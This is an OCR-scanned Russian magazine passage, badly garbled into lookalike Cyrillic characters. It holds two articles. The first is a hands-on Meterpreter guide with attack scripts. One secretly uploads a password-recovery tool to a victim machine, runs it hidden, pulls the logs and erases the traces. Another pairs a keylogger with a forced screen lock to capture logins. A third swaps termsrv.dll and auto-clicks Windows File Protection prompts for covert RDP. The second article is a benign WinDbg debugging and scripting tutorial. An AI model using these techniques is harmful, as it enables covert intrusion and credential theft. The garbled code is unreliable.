То теперь это можно сделать так: 

стб_ехес (стб) 

Или добавление значений в реестр. Было: 

кеу = 1 НКЬМ\\8узкет\\ . . . ' 

гоок_кеу, Ьазе_кеу = зеззіоп . зуз . гедізкгу . 
зрііккеу (кеу) 
ѵаіие = "Ѵаіие" 

ореп_кеу = зеззіоп . зуз . гедізкгу . ореп_кеу ( гоок_кеу , 
Ьазе_кеу , КЕУ_ШКІТЕ) 

ореп_кеу . зек_ѵаіие (ѵаіие, зеззіоп. зуз .гедізкгу . 
куре2зкг ( "КЕС_ШОБШ>” ) , 0) 

Стало: 



гедізкгу_зекѵаібака ( кеу , ѵаіпаше , бака , куре ) 

«Новые» функции, да и структуру можно изучить по самому МБР 



(\т зі'ЗМі Ь\т зб\) . МР уже содержит множество скриптов, которые 
выполняют самые разнообразные действия. Их мы вполне можем 
взять за основу для написания своих скриптов (создатели МБР как 
раз это и предлагают). Официальные скрипты для МР в основном 
пишет Сагіоз Регег. У него есть отличный блог, і, где 

он описывает большинство скриптов, их логику, всякие хитрости. 
Запустить любой скрипт МОЖНО: 

• командой «гип» или «Ьдгип» в активной сессии; 

• «зеззіоп -з» для всех сессий из тзЯ кон соли; 

• используя опцию АіЛоПипБсгірІ или I піііа ІАиІоРи пБсгі рі при кон- 
фиге нагрузки — для запуска скрипта сразу при создании сессии. 
Далее я перечислю основные скрипты, примерно раскидав их по типам: 

текзѵс, зсйебиіете , регзізкепсе — прописывает МР на 
автозапуск; 

аикогоике — прописывает маршрутизацию пакетов для 
всех найденных подсеток жертвы; 

зсгарег, сЬескѵтп, ѵЯпепит, дек_епѵ, епит_ромегзЬе11_ 
епѵ, епит_1оддес!_оп_изегз , ботаіп_1ізк_деп, 
гетокеміпепит — сбор инфы о системе; 

дек_1оса1_зиЬпекз , пекепиш, агр_зсаппег, битрііпкз — 
сбор инфы о сетевом окружении системы; 
дек_арр1ісакіоп_1ізк , епит_ѵпмаге , ргекексккооі — 
сбор инфы об установленном ПО; 

декдиі , деккеіпек, ѵпс — включаем КБР, кеіпек или 
ѴЫС- сервер; 

дексоипкеппеазиге , кіііаѵ — гасим АѴ, отключаем НАС, файер; 
ЬазПбитр, сгебсоііеск , - «кража» хешей, токенов; 
ѵ^іпМ — брутфорс логона; 
зсгееп_ип1оск — сброс окна логона; 
ѵлпіс — запуск ѵшпіс-команд ; 

зсйказкзаЬизе — запуск команд по расписанию; 
епиш_кігекох , епиш_рикку, декѵпсрхѵ, дек_кі1е2І11а_ 
сгебз , дек_рібдіп_сге<із — кража паролей и конфиденци- 
альной информации разного ПО; 

рапба_2 007_раѵзгѵ51 , рш1_бгіѵег_сопкід , згк_тлеЪс1гіѵе_ 
ргіѵ, кікгарОб — повышение привилегий; 
зеагс1і_б^1б, кі1е_со11еског — скачка каких-либо файлов; 
шідгаке, кеуіодгесогбег , раскекгесогбег — «повтор» 
стандартных команд МР; 

шиікісошшапб, шиікізсгірк, иріоабехес — ускорение 



Русский язык в М5Р. 



По большому счету с русским языком проблем в МБР нет. Все до- 
статочно четко работает, отображается. Но все же пару моментов 
хотелось бы выделить. 

Во-первых, олдскульная проблема с МБР под *піх и Меіегргеіег’ом. 
Кодировки в линуксе — ІЯР, МР — ср 1 251 , консоль винды — 866. Но, 
насколько мне известно, проблема эта решена. Если нет — 
Ы:І:р://і:акеѵѵогМ.Ыод5роксопп/2008 11 01 агсЫѵе.МтІ . 

В винде с МБР есть несколько другая проблема — надо добавлять 
поддержку русского языка в судѵѵіп. Делается это добавлением в 
.ЬазЬгс, лежащим в директории пользователя, двух строчек: 
ехрогк ЬАЫО= " ги_ЕІІ . С Р 1 2 5 1 " 
аііаз 1з= ' 1з --зкютл-сопкгоі-скіагз 1 



действий за счет их группировки. 

Как видно, многое уже сделано до нас. Проблем с разбором исход- 
ников не возникает, так что достаточно просто соорудить что-то 
свое. Приведу житейский пример. 

Была такая задача — достать пароли к основному ПО. Сейчас все еще 
идет официальная разработка скрипта, который будет вынимать всю 
инфу, включая пассы, из браузеров, почтовых прог, но она еще далека 
от завершения. Потому быстренько был накидан скриптик, который 
закачивает жертве софтины по «восстановлению» паролей от гш 
пек скрытно запускает их, скачивает логи и удаляет все следы за 
собой. Приведу уменьшенную (для одной жестко прописанной софти- 
ны) версию: 

зеззіоп = сііепк 

1юзк,рогк = зеззіоп. киппе1_реег . зріік ( 1 : 1 ) 
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Работаем параллельно с обычным пользователем 
через ВОР 

# Находим папку Тешр у жертвы 

бшр = зеззіоп. бз . бііе . ехрапб_рабЬ (" %ТЕМР% " ) 

# Определяем, где у нас будут 

# храниться полученные логи от тулзы 

Іодз = : : Рііе . :іоіп (Мзб : : Сопбід . сопбід_бігесбогу , 

' Іодз ' , ' дебразз ' , 

бюзб + + : : Тіше . пом. збгббіте ( " %У%т%б. %М%8 " ) ) 

: : Рііеіібііз .шкбіг_р ( Іодз) 

# Запускаем подпрограмму 

дебразз ( зеззіоп, бшр , Іодз, " РаззмогбРох. ехе" ) 

беб дебразз (зеззіоп, бшр , Іодз , ехепаше) 

# Определяем файл для закачки, 

# а также имена файлов у жертвы 
раззгесехе = Рііе. лоіп (Мзб :: Сопбід. іпзба11_гооб, 

" баба ", " # { ехепаше } " ) 

раззгесзсгапЫе = зргіпбб ("%. 56" , гапб ( 100000 ) ) 
ІодзсгапЫе = зргіпбб ("%. 56" , гапб ( 100000 ) ) 
зеззіоп. бз . бііе .ир1оаб_бііе ( 

" # {бшр} \\# {раззгесзсгапЫе} .ехе" , 

" # {раззгесехе} " ) 

# Запускаем восстановление паролей с 

# логированием итогов в файлик с рандомным именем 
г = зеззіоп. зуз .ргосезз . ехесибе ( " сшб. 

ехе /с # {бшр} \\# {раззгесзсгапЫе} . ехе /збехб 

# { бшр }\\#{ ІодзсгапЫе} " , піі, 

{'Ніббеп 1 => ' бгие ' , ' Скаппеіігеб' => бгие} ) 
зіеер (2) 

# Ждем окончания действия программы 
ргод2сЬеск = " # {раззгесзсгапЫе} . ехе" 
боипб = 0 

мЫІе боипб == 0 

зеззіоп. зуз. ргосезз. деб_ргосеззез () .еасЬ. бо |х| 
боипб =1 

іб ргод2сЬеск == (х [ ' паше ' ] . бомпсазе) 
ргіпб " . " 
зіеер (0.5) 
боипб = 0 
епб 
епб 



В 




Аа І ^ I 

ѴѴ/іпсІоѵѵ/5 Рііе РгоіесНоп. Требуется быстро нажать две 

КНОПКИ 



епб 

г . скаппеі . сіозе 
г . сіозе 

# Удаляем тулзу 

зеззіоп. зуз .ргосезз . ехесибе ( "сшб. ехе /с беі 
# {бшр} \\# {раззгесзсгапЫе} .ехе" , піі , 

{'Ніббеп' => 'бгие'}) 

# Скачиваем файл логов в 
зеззіоп. бз . бііе . боші1оаб_бі1е ( 

"#{1одз}#{ : :Рі1е: : Зерагабог} # {ехепаше} .бхб" , 

" # {бшр} \\#{ ІодзсгапЫе} " ) 
ргіпб_збабиз ( 

"РіппізЬеб бомпіоабіпд Іодз мібЬ. раззмогбз") 

# Удаляем файл логов у жертвы 
зеззіоп. зуз .ргосезз . ехесибе ( 

"сшб. ехе /с беі # {бшр} \\#{ ІодзсгапЫе} " , 
піі, {'Ніббеп' => 'бгие'}) 

Думаю, все достаточно понятно и по комментам, и по названиям 
функций. Только два момента: скриптик старый, написан без новых 
оберток, а файл РаззѵѵогсІРох.ехе берется из папки баіа в ітібіЗ. 

Сила рельсы... 

Но это все не так уж интересно. Как минимум, старо. Отличная 
вещь произошла этим летом. В июне месяце Раігіск НѴЕ пред- 
ставил на всеобщее обозрение свой чудо-плагин под МР. Имя 
ему — Раіідип! Что нам дает этот плагин? Многое. А именно — 
прямой доступ к виндовым АРІ. Если точнее, то мы имеем доступ 
к любой функции любой сИГки у жертвы. Ну как, слюнки потекли? 

:) Простенький пример можно написать прямо в МР (чтобы прова- 
литься в интерпретатор — команда «ігЬ») : 

»с1іепб . соге .изе ( "гаіідип" ) 

»с1іепб . гаіідип . изег32 .МеззадеВохА ( 0 , "Неііо, 
мог 16! " , "Тезб " , "МВ_ОК" ) 

Сначала подгружаем плагин, потом отображаем мессагу. 
Особенности гаіідип’а : 

1) Синтаксис сііепі. гаіідип. ШЕЕ-І\Іаппе}.{ЕипсІіопІ\Іате} 
({Рагатеіегз}); 

2) Рельса может возвращать значения от функций. Как минимум, 
геіигп и СеНазіЕггог; 

3) Можно использовать стандартные константы винды вместо циф- 
ровых значений. Константы можно посмотреть в арщсопзІапІз.гЬ; 

4) Если нам нужно передать N 14 И, то мы подставляем піі; 

5) Поддерживаются как юникодовские, так и обычные версии функ- 
ций. 

По стандарту в гаіідип (см. тзЩіЬѴехѴрозДппеІегргеІегѴехІепзіопзѴ 
гаіІдип\арі.гЬ) определено около 1000 АРІ из кегпе132, изег32, пісііі, 
\д/з2_32. Там самые основные, но мы легко можем добавить и свою сііі: 

»с1іепб . гаіідип . абб_б11 ( ' зтагбсагб ' , ' с : \ Хргодгат 
6і1ез\\зтагбсагб\\зтгбсгб7823 .611 ' ) 
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Собираем информацию о системе жертвы 
и ее окружении 



И определить свои функции: 

гаіідип. абб_іипс1:іоп ( 'кегпе132' , 

' КеабРИе ' , ' ВООЬ ' , [ 

[ " БШВБ " , " ЪРіІе" , "іп" ] , 

[ " РВЬОВ " , " ІрВи# іег " , " оиЬ " ] , 

[ " БШВЮ" , "пРитЪегОіВуЬезТоКеасі" , " іп" ] , 

[ " РШЮКЮ " , " ІрРитЪегОіВуЬезКеасІ" , " оиЬ" ] , 
["РВЬОВ" , " ІрОѵегІарреб" , " іпоиЬ"] , 

] ) 

Подробности использования ищи в описании к 
гаіідип’у. 

Теперь приведу пару стандартных примеров. Находим 
все подмонтированые диски в системе (включая сете- 
вые): 

# подгружаем рельсу 
сІіепЬ . соге .изе ( " гаіідип" ) 

# Получаем список дисков в системе 
а = сІіепЬ . гаіідип . кегпе132 . 
СеЬЬодісаІБгіѵез ( ) ["гекигп" ] 

# Приводим полученное значение в удобовари- 
мый вид 

бгіѵез = [ ] 

ІеЬЬегз = " АВСБЕРСНШКЬМШРОКЗТШЛлГХУР " 

( 0 . .25) . еасП бо I і I 

ЬезЬ = 1еЬЬегз[і,1] 
геш = а % (2** (і+1) ) 

іі геш > О 

бгіѵез « ЬезЬ 
а = а - геш 

епб 

епб 

ргіпЬ_1іпе ( "Бгіѵез АѵаіІаЫе = #{ бгіѵез. 
іпзресЬ) " ) 

Более злобный пример: 

Запускаем кейлоггер в МР 

шеЬегргеЬег > Ьдгип кеуіодгесогбег -с 1 -Ь 
15 

Переходим в руби и лочим систему 
шеЬегргебег > ігЪ 
» сііепб . соге . изе (" гаіідип" ) 



=> Ьгие 

» сііепб . гаіідип . изег32 . ЬосШогкЗЬаЬіоп ( ) 

=> { "СеЬЬазЬЕггог " =>0 , "гекигп" =>Ьгие) 

» ехіЬ 

Теперь у юзера залочился экран, и он честно введет 
свой пасс, чтобы заново войти в систему. А мы, в свою 
очередь, получим этот пасс без особо долгого ожидания 
и мусора с помощью кейлоггера. 

В качестве личного эксперимента вспомнилась про- 
шлогодняя статья тОгО «Автосплойт как образ жизни: 
Массрутинг в локальной сети». Статья основыва- 
лась на идее, почерпнутой отсюда: Ьгит.апЬсЬаТги/ 
1:ЬгеасІпаѵ99665- 1 -1 О.ЫтЬ Суть идеи: через какую-либо 
уязвимость проникаем в ѴѴіпХР, добавляем пользователя 
и включаем ВОР. Плюс подменяем системную библиоте- 
ку Іегтзгѵ.сИІ на более старую. Старая библиотека дает 
нам возможность подключаться по РРР, не выкидывая 
обычного пользователя из его сеанса. Основная про- 
блема заключалась в том, что библиотека — системная, 
потому пользователю отображается окно от ѴѴіпсіоѵѵб Рііе 
Ргоіесбоп с вопросом, что делать с нестандартной вер- 
сией сІІГки. А потом еще одно с еще одним подтвержде- 
нием своего решения. Раньше средствами МР нажимать 
на кнопки мы не могли. Теперь же, с гаіідип’ом, у нас 
такая возможность появилась. Если будешь разбираться 
с кодом, то трудностей возникнуть не должно. Там все 
достаточно просто, особенно если знаешь, как работает 
ѴѴіпАРІ. Отмечу лишь основные моменты с использо- 
ванием ѴѴіпАРІ. Во-первых, в МР я не нашел функции 
для переименования файлов, потому воспользовался 

ВИНДОВОЙ: 

кегпе132 .МоѵеРіІеА ( "с : \\міпбоѵ\гз\\зузЬет32\\ 
Ьегтзгѵ. 611 " , "с: \ \ѵ\гіпбомз\\зузЬет32 \\ 
Ьегтзгѵ. оіб" ) 

Во-вторых, для получения хэндлера окна с сообщением 
используется поиск по классу: 

рагНШГБ=изег32 . РіпбШіпбомА ( "#3277 0" ,пі1) 

А поиск нужной кнопки — по названию: 

сЬНШГО=изег32 . РіпбШіпбоѵіЕхА (рагНШГО [ " геЬигп 
" ] ,0,411, 

" #{сапсе1} " ) 

Нажатие кнопки происходит в следующей последова- 
тельности: 

изег32 . РозЬМеззадеА (сЬНШГБ [ " геЬигп" ] , 

"ш_ьвілтоыбош п , о , о ) 

изег32 . РозЬМеззадеА (сЬНШГБ [ " геЬигп" ] , 
"Ш_ЬВБТТОШР" ,0,0) 

То есть все достаточно просто. Теперь уж точно можно 
поиметь систему одной кнопкой из М5Р :). 

Заключение 

Как мы увидели, Меіегргеіег — очень мощная основа, 
особенно с учетом того, что он развивается и обрастает 
новыми возможностями, а также за счет тех расшире- 
ний, которые к нему можно добавить. А если к этому 
добавить наши прямые руки! Так что творить — чудес- 
но, а ученье — свет. Дерзай :). т 




| НТТР://ѴѴѴѴѴѴ| 

I Г 

> Ііпкз 

• РНР Меіегргеіег 

— Ыод.теіазрІоіЬ 
сот/2010/06/теіег- 
ргеіег-іюг-рѵѵпесі- 
Ьоте-радез.ЫтІ 
•Заѵа Ме1:егрге1;ег 

— зсЬіегІт.изегз. 
зоигсеіюгде.пеі:/ 
ЗаѵаРаѵІоасІ/ 
теІазрІоіТсот/гесІ- 
тіпе/іззиезМОб 

• Инфа о теіазріоібе 

— теіазріоіксот 
•Старое описание 
теіегргеіег и его АРІ 

— теІазрІоіЬсот/ 
сіоситепіз/теіег- 
ргеІюг.рсТ 
•Скрипты к МР — 
сіагкорегаіог.сопп 
•Инфа по ѴѴіпАРІ 
для работы с Раіідип 

— тзсІп.ппісгозоП. 
сот/еп-из/ІіЬга г у/ 
аа383749 

•Коды ошибок — 
тзсІп.ппісгозоІТ 
сот/еп-из/ІіЬга гу/ 
тз681381 
(У5.851.азрх 
•Недокументи- 
рованные ѴѴіпАРІ 

— ипсіоситепіесі. 
пЦпІегпаІз.пеІ:/; 
зоигсе.ѵѵіпеЬд.огд/ 
ѴѴіпеАРІ/ 
•Классический 
удаленный сі II іщес- 
Ьоп — поіодіп.огд/ 
Роѵѵпіоасіз/Рарегз/ 
гетоіе-ІіЬга гѵ-іщес- 
Ьоп.рсТ 

• РеііесЬѵе сі II іщес- 
ііо п — Ьагтопузе- 
сигку.сот/ВеИесЬу- 
еРШщесЦоп.ЫтІ 
ЬагтопузесигКу.сот/ 
Ыез/Н5-Р005 РеПес- 
ЦуеРШщесЬоп.рсТ 
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ЧИП 



Решать 



доузда 

ѴѴіпгіЬд 



Простые приемы сложного отладчика 



• ѴѴіпсІЬд - это мощный отладчик как для юзермодных приложений, так 
и для драйверов. Множество плагинов, команд, скриптовый язык... Все 
это может смутить и опытного в отладке человека. Особенно актуальна 
эта тема для реверсеров, которым пришлось полностью или частично 
перейти на 64-битные платформы. 



ВЕДЬ, ПО СУТИ, НИ ОДИН ИМЕЮЩИЙСЯ Х64-ОТЛАДЧИК НЕ СПО- 
СОБЕН СРАВНИТЬСЯ С ѴѴІЫОВС ПО ФУНКЦИОНАЛУ, ПОЭТОМУ 
РЕЧЬ В ОСНОВНОМ ПОЙДЕТ ПРО 64-БИТНЫЕ ВЕРСИИ ѴѴІ№ОѴѴ5, 
НО И ОБЛАДАТЕЛИ 32-БИТНЫХ СМОГУТ ОБНАРУЖИТЬ ДЛЯ СЕБЯ 
ИНТЕРЕСНУЮ ИНФОРМАЦИЮ. 

Патчим 

ѴѴіпйЬд славится обилием различных расширений. Загрузка рас- 
ширения делается командой: 

. Іоай имя_расширения 

А выгрузка - командой .ипіоай. 

К сожалению, довольно удобный плагин для отладки псііз- 
драйверов, псіізксі, отказался работать в моем ѴѴіпбЬд 6.11.1.404 
(псіізксі. сІИ можно найти в Ѵ\ШК или в директории \ОеЬиддіпд 
Тооіз Іюг ѴѴіпсІоѵѵз (х64)\ѵѵіпхр). Например, при попытке выпол- 
нить команду ! псіі зксі . іпкег Іасез ответ был неизменным: 
«СапЧ деі оІТзеІ оі 1 І_іпк іп N 0 1 8_І Р_В ЮС К ! ». Аналогичный 
результат давало выполнение команд орепз, ргоіосоіз и осталь- 
ных. Перезагрузка символов результата не давала, все струк- 
туры были в порядке. Отказываться от такого удобного рас- 
ширения у меня не было желания, поэтому я решил прибегнуть 



к патчу, если это возможно (были бы исходники - можно было 
бы переписать, например). Загружаю плагин в Іба. Начнем 
исследование с команды іпіегі'асез. Все команды, имеющиеся 
в расширении - это экспортируемые функции (что очень упро- 
щает мою задачу). То есть достаточно найти функцию іпіегіюсез 
в экспорте и проанализировать ее. 

ЧТО Ж, приступим: 



. ЬехР : 0000000180012920 
. ЬехР : 0000000180012920 

. ЬехР : 0000000180012920 
. ЬехР : 0000000180012925 
. ЬехР : 00000001800 12 9 2А 
. ЬехР : 00000001800 12 92Р 
.ЬехР: 0000000180012934 



риЫіс іпрегіасез 
іпЬегІасез ргос пеаг 

шоѵ [гзр+агд_18] , г9с! 
шоѵ [гзр+агд_10] , г8 
шоѵ [гзр+агд_8] , тдх 
шоѵ [гзр+агд_0] , гсх 
ризЬ. гЬх 



. ЬехР : 00000001800129АР Іеа г8 , [гзр+0С8Ь+ѵаг_2С] 

. ЬехР : 0000000180012 9В7 Іеа гсЬс, аЬіпк ; "Віпк" 

. РехР : 00000001800 12 9ВЕ шоѵ гсх, сз :ЫБІ8_ІР_ВЬОСК_ЫАМЕ 
; получаем смещение поля Ьіпк в структуре ЫБІЗ_ІР_ВЬОСК 
. ЬехР : 00000001800129С5 саіі ОеЬРіеШОІІзеЬ 
. ЬехР : 00000001800129СА ЬезЬ еах, еах 
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Таблица экспорта исследуемого плагина 



. ЕехЕ : 00000001800129 СС ]2 зТюгЕ 1 ос_ 1800129 Е 0 

. ЕехЕ : 0 00 0 00 0 18 0 012 9 СЕ Іеа гсх, аСапТОеЕОЕЕз _22 

; "Сап ' Е деЕ оЕЕзеЕ оЕ Ьіпк іп М)ІЗ_ІР_ВЬО" . . . 

. ЕехЕ : 0000000180012 9 Б 5 

саіі сз : ЕхЕепзіопАріз . 1 рОиЕриЕКоиЕіпе +4 
. ЕехЕ : 00000001800129 БВ зшр 1 ос_ 180012 ВЕІ 

Видим вывод сообщения о том, что невозможно получить смеще- 
ние поля Ыпк в структуре І\ЮІ5_ІЕ_ВЕ0СК_І\ІАМЕ. Посмотрим, что 
за строка І\ЮІ5_ІР_ВЕ0СК_І\ІАМЕ. 



Одна из альтернатив ѴѴіпОЬд - отладчик МЬд 



Отлавливаем загрузку драйвера 

А как остановиться на ОгіѵегЕпІгу отлаживаемого драйвера? 
Можно, конечно, поставить ігЛ 3 в начале функции, но не всегда 
хочется уродовать код брейками. Так может быть есть альтернатив- 
ное решение? Оказывается, что есть. Как я уже говорил, ѴѴіпОЬд - 
мощный отладчике огромным количеством возможностей, поэтому 
грех не воспользоваться ими снова. Но для начала немного тео- 
рии. Непосредственный переход на точку входа драйвера осущест- 
вляет неэкспортируемая функция ІорЕоасЮгіѵег. Да, ты правильно 
понял, - неэкспортируемая - это значит, надо иметь отладочные 
символы (и вообще, без них отладка ядра может превратиться в 
настоящий ад). В моей Ѵізіа используется такой код (его можно 
найти или однократным трейсом или идой, дизассемблируя ядер- 
ную ІорЕоасЮгіѵег): 

РАСЕ: 00000001403 АС 40 А 1 ос_ 1403 АС 40 А: 

РАСЕ: 000000 0140 ЗАС 40 А 

; ІорЬоасІВгіѵег +9 8 Вб 
РАСЕ : 000000 0140 ЗАС 40 А шоѵ 
РАСЕ : 000000 01403 АС 40 Б шоѵ 
РАСЕ: 00000001403 АС 410 саіі 



гсЬс, гзі 
гсх , гЬх 

дчлгогсі рЕг [гЬх+ 58 Ь] 



БКІѴЕК_ОВЦЕСТ . БгіѵегІпіЕ 



. ЕехЕ : 0000000180001260 аШізШІЗ_іЕ_ЪІ сЗЬ ' псііз ! ББІ 8 _ 
ІЕ_ВБОСК ' , 0 

Выполнение команды: 



Собственно, убедиться, что по смещению 0x58 в ВРІѴЕР_0В6ЕСТ 
находится именно ОгіѵегІ піЕ, можно в кб командой сП; _0РІѴЕР_ 
0В6ЕСТ. 

Что соответствует последовательности байт: 



СІЕ псЗіз ШБІЗ_ІЕ_ВБОСК 



48 8 В Б 6 48 8 В СВ ЕЕ 53 58 



Сразу дает ответ, почему плагин рушится: «5утЬоІ псі І5 ! N Ю 1 5_ 

I Р_В ЮС К поі Тоипб». Тогда как сН псі із !_Ы Ю 1 8_І Р_В ЮС К нор- 
мально выводит структуру. Очевидно, надо изменить строки и 
ссылки на них, чтобы все работало нормально. Для нашей зада- 
чи воспользуемся каким-нибудь адекватным Ьех-редактором. 
Мне нравится 010 Ебііог. Исправим строки. В основном выравнива- 
ние позволяет нам безболезненно добавлять один символ в строку, 
не сдвигая остальные, но для пары строк это не так. Поэтому нужно 
найти ссылки на эти строки и исправить их. На каждую строку в 
данном случае по одной ссылке, находящейся в секции данных, на 
которую ссылаются инструкции, поэтому достаточно исправить ее. 
Например, на строку «пбІ5!и8Т_ЕІ\ІТРѴ» ссылка выглядит так: 

.сТаЕа: 0000000180018470 Ы 8 Т_ЕЕТКУ_БАМЕ сід оЕЕзеЕ 
а№біз_ 1 ізС_епЕг ; БАТА ХКЕЕ : ркЕроо 1 з+ 5 Бг 

Смотрим, что в хексе это соответствует последовательности «68 
14 00 80 01 00 00 00». Теперь нужно найти ее в хекс-редакторе и 
исправить первые байты. 

После этого небольшого патча пбізкб выводит всю нужную инфор- 
мацию. 



Чтобы найти искомый адрес, нужно ввести в командной строке 
ѴѴіпОЬд: 

з пЕ ! ІорЬоасІБгіѵег Б2000 48 8В Б6 48 8В СВ ЕЕ 53 58 

Где з - это команда поиска последовательности, пЕІорЕоасЮгіѵег 
- адрес начала поиска, Ь2000 - количество байт, ограничивающее 
поиск, «48 8Е> 06 48 8В СВ ЕЕ 53 58» - байты, которые мы ищем. 
Отладчик ответит что-то вроде: 

ЕЕЕЕЕ800'01с0940а 48 8Ъ йб 48 8Ъ сЬ ЕЕ 53-58 4с 8Ъ 

15 5е 20 сМ ЕЕ Н . . Н . . . ЗХБ . . Л .. 

Вот и все. Теперь можно ставить точку останова на полученный 
адрес. В нашем случае - ІУІУШОО' 01 с0940а. Отныне мы будем полу- 
чать управление как раз на переходе на точку входа. Этот метод 
довольно неплох, а что использовать - іпі 3 или его - решать тебе. 

Скриптинг 

Написание скриптов для ѴѴіпОЬд - это отдельная, очень большая 
тема. В рамках данной статьи я сделаю только введение. Для при- 
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Успешный патч расширения псіізксі - команды рабо- 
тают отлично 



Нужные 



мера напишем простой скрипт для расстановки бряков на всех 
Марг-функциях в ОРІѴЕРМЭЕиЕСТ’е, в качестве аргумента прини- 
мает указатель на сігіѵег о^'есі; выбранного драйвера. 

.Ыоск 

{ 

. саксЪ. 

{ 

г $1:0 = $агд1 

.ргіпкк "Бгіѵег оЪ^еск ак 0х%І64Х\п" , @$1:0 
г? $к1 = (пк!_ШІѴЕК_ОВЦЕСТ*) @$к0 
г $1:0 = @@с++ ( @$к1->Туре) 

. ік ( @$к0 = = 4 ) 

{ 

г $1:0 = @@с+ + ( @$кі->Маз огЕипскіоп) 

.ког(г $к!=0;@$к1<1с;г $Ы = @$к1 + 1) 

{ 

г $1:2 = @$кО + @$Ы*8 

г? $1:3 = * (ѵоісі**) @$1:2 
.ргіпкк " Еипскіоп ак 0х%І64Х\п" , @$кЗ 
. ІО ( @$1:3 ! =0 ) 

{ 

Ьр @$03 
} 

} 

} . еізе 
{ 

.ргіпкк "Ыок а сігіѵег оЬзесО’Хп" 

} 

} 

} 

$а гд 1 - это первый аргумент (и так до $агдІ\І), Ш-1 1 9 - внутренние 
псевдорегистры. Заметь, синтаксис очень похож на С++ (циклы 
бог, ѵѵЫІе...). Сначала в скрипте проверяется поле 0РІѴЕР_0ЕиЕСТ. 
Туре, если оно равно четырем, то это действительно 0РІѴЕР_ 
ОЕиЕСТ (не забывай перед использованием этого скрипта подгру- 
жать символы!). 

Потом получаем указатель на таблицу 0РІѴЕР_0ВЗЕСТ. 
МаргЕипсбоп. Затем мотаем цикл по всем Марг-функциям (всего 
их 27 - 0x1 Ь). И как только мы находим подходящий указатель 
(не нулевой), ставим на него бряк (Ьр СЗ$бЗ) . Отладочные сообще- 
ния выводим функцией .ргіпіТ. Скрипт написан с учетом раз- 
мера 64-битного указателя (8 байт), что видно из строки «г $12 
= Й$1:0+(с1$1:1 *8». Чтобы скрипт заработал на 32-битной системе, 
нужно просто изменить размер указателя на 4. Обрати внимание 
- перед внутренним регистром во время операции присваивания 
ставится г, когда тип числовой, и г?, когда нечисловой. 

Для тестирования скрипта нужно сначала получить указатель на 
объект-драйвер какого-нибудь драйвера с помощью команды 



ІсІгѵоЬ) или иным способом. В примере ниже показано получение 
адреса сігіѵег оЬ)есІ Ібх.зуз. 

ксІ> ! сігѵоЪз кЬх 

Бгіѵег оклеек (ккккка8001еа1330) із ког: 

\Бгіѵег\кс1х 

Бгіѵег Ехкепзіоп Ьізк: (ісЗ , аскіг) 

Беѵісе Оклеек Іізк: 

ккккка8001ес72к0 ккккка8001ес52 к0 ккккка8001ес32к0 
ккккка8001ес12к0 

ккккка8001еЪк2 к0 ккккка8001еЪЬ2 к0 ккккка8001еЪ5300 

Скрипты бывают многострочные и однострочные. Многострочные 
запускаются из командной строки $$><файл_скрипта, а одностроч- 
ные - $$<текст_с крипта (или $<). 

Если мы хотим передать скрипту аргументы, то надо писать 
$$>а<файл_скрипта (как раз наш случай). 

Теперь модифицируем скрипт выше, чтобы он ставил брейк на 
конкретный обработчик беѵісе о^'есСа, а не на все сразу. 

$$ $агд1 - сЗеѵісе оЪ^еск 
$$ $агд2 - кипскіоп пишЬег 
.Ыоск 
{ 

. саксЪ. 

{ 

г $1:0 = $агд1 

.ргіпкк "Бгіѵег оЬ^еск ак 0х%І64Х\п" , @$к0 
г? $к1 = (пк !_БЕІѴЕЕ_ОВЦЕСТ* ) @$к0 
г $к0 = @@с++ ( @$к1->Туре) 

. ік ( @$к0==4 ) 

{ 

г $к0 = @@с + + (@$к1->Ма;іогЕипскіоп) 
г $к1 = $агд2 

$$сЬескіпд зесопсі агдишепк 
. ік (@$к!<Іс) 

{ 

г $к2 = @$к0+@$к1*8 

г? $кЗ = * (ѵоісі** ) @$к2 
.ргіпкк " Еипскіоп ак 0х%І64Х\п" , @$кЗ 
. ік ( @$кЗ ! =0 ) 

{ 

Ьр @$кЗ 
и @$кЗ 

} 

. еізе 
{ 

.ргіпкк " ІпѵаІіЬ кипскіоп аскЗгеззХп" 

} 

} 

. еізе 



► 062 
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По непонятной причине плагин отказывается получать информацию из структуры 



{ 

. ргіпкк " Іпѵаіісі Еипс1:іоп питЬег: тизк Ье 

0-ІВ\п" 

} 

} . еізе 

{ 

.ргіпкк "Бок а сігіѵег оЪпеск!\п" 

} 

} 

} 

Комментарии начинаются с символов $$. Проверяем теперь два 
аргумента. Первый без изменений - поле РеѵісеОЬ)ес1:.Туре=4, 
а второй - это принадлежность к диапазону 0-1 В, то есть допу- 
стимые обработчики от 1ПР_М0_СПЕАТЕ до 1РР_М0_РЫР. Обрати 
внимание на строку и Й$1;3 - здесь осуществляется переход по 
адресу интересующего обработчика. Результат работы скрипта 
выглядит следующим образом (для разных вариантов входных 
аргументов): 

кЬ> $$>а<с : \с!о2 . ѵгсіз ккккка8001еа1330 2 
Бгіѵег оЪ^еск ак 0хРРРРРА8001ЕА1330 
Рипскіоп ак 0хРРРРРАб00Аб0Б83 О 
кЬхІТсІхТсІіБізраксЬСІозе : 
кккккабО ' ОабОсШЗ О ризЬ гЬх 

кккккабО ' 0а60с1832 зиЬ гзр,20Ь 

кккккабО ' 0аб0с183 б стр гсх,дѵгогс1 ркг 

[ ксЬс ! ТсІхБеѵісеОЪп еск ( кккккабО ' ОабІебБО ) ] 
кккккабО ' 0а60с183с1 шоѵ гах,дѵгогс1 ркг [гс!х+0В8Ь] 

кккккабО ' 0а60с1844 шоѵ гЪх,гс!х 

кккккаб0'0а60с!847 зе 

ксіх ! Т<іхТс1іБізраксЬС1озе+0х71 
( кккккабО ' ОабОЬѲаІ } 

кккккабО ' 0аб0с1849 шоѵ гсх,ф\гогс! ркг [гах+ЗОЬ] 

кккккабО ' 0аб0с184с1 стр дѵгогсі ркг [гсх+20Ь],2 

к(3> $ $>а<с : \сіо2 . жіз ккккка8001еа1330 24 
Бгіѵег оЪ^еск ак 0хРРРРРА8001ЕА1330 
Іпѵаіісі кипскіоп питЬег: тизк Ье 0-ІВ 

кЬ> $$>а<с : \Ьо2 .жіз ккккка8001еа1350 7 
Бгіѵег оЪпеск ак 0хРРРРРА8001ЕА1350 
Бок а сігіѵег оЬ^еск! 

Вообще, это довольно простые задачи. Иногда требуются более 
сложные узкоспециализированные скрипты, рассмотрение 
которых выходит за рамки настоящей статьи. Кстати, сейчас 



і'Ыі ,л ' ■ ь ; н * . - е я г . і- і.і. і. 

■ ■ - ■ ЛИ - 

г 



Исправляем строки в 010 ЕсІНог 



появилось расширение, которое позволяет использовать питон 
в ѴѴіпРЬд - рукб (что очень хорошо, ведь не у всех есть время 
и желание осваивать встроенный скриптовый язык), правда 
он в стадии тестирования. Плагин требует предустановленный 
